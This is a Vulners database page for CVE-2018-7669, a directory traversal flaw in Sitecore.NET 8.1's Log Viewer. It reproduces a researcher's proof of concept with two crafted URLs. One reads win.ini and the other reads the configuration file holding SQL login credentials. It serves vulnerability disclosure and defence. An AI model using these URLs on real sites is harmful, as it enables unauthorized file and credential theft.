| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Sitecore.Net 8.1 - Directory Traversal Vulnerability | 9 Aug 201800:00 | – | zdt | |
| CVE-2018-7669 | 9 Aug 201814:28 | – | circl | |
| Sitecore Sitecore.NET Log Viewer Application Path Traversal Vulnerability | 2 May 201800:00 | – | cnvd | |
| Sitecore.NET Directory Traversal (CVE-2018-7669) | 31 May 202000:00 | – | checkpoint_advisories | |
| CVE-2018-7669 | 27 Apr 201816:00 | – | cve | |
| CVE-2018-7669 | 27 Apr 201816:00 | – | cvelist | |
| Sitecore.Net 8.1 - Directory Traversal | 6 Aug 201800:00 | – | exploitpack | |
| CVE-2018-7669 | 27 Apr 201816:29 | – | nvd | |
| Sitecore.NET 8.1 Directory Traversal | 26 Apr 201800:00 | – | packetstorm | |
| Directory traversal | 27 Apr 201816:29 | – | prion |
# Exploit Title: Sitecore.Net 8.1 - Directory Traversal
# Date: 2018-04-23
# CVE: CVE-2018-7669
# Researcher: Chris Moberly at The Missing Link Security
# Vendor: Sitecore
# Version: CMS - 8.1 and up (earlier versions untested)
# Authentication required: Yes
# An issue was discovered in Sitecore CMS that affects at least
# 'Sitecore.NET 8.1' rev. 151207 Hotfix 141178-1 and above. The 'Log Viewer'
# application is vulnerable to a directory traversal attack, allowing an attacker
# to access arbitrary files from the host Operating System using a
# 'sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=' URI. Validation
# is performed to ensure that the text passed to the 'file' parameter correlates
# to the correct log file directory. This filter can be bypassed by including a
# valid log filename and then appending a traditional 'dot dot' style attack.
# [Steps to Reproduce]
# The 'Log Viewer' application renders log files from the local filesystem inside
# the web browser using a URL like the following:
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=
# The following URL can be used to validate the vulnerability by accessing the
# win.ini file on a Windows host (remove line breaks):
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=c%3a%5cwebsites%5c<website>%5cdata%5clogs%5<valid log file>.txt\..\..\..\..\..\windows\win.ini
# The following URL can be used to access the application's configuration file
# containing SQL login credentials (remove line breaks):
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=c%3a%5cwebsites%5c<website>%5cdata%5clogs%5c<valid log file>.txt\..\..\..\Website\App_Config\ConnectionStrings.config
# Both of the above URLs are dependent on the application's configuration and
# must be modified to correct the <website> and <valid log file> portion.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation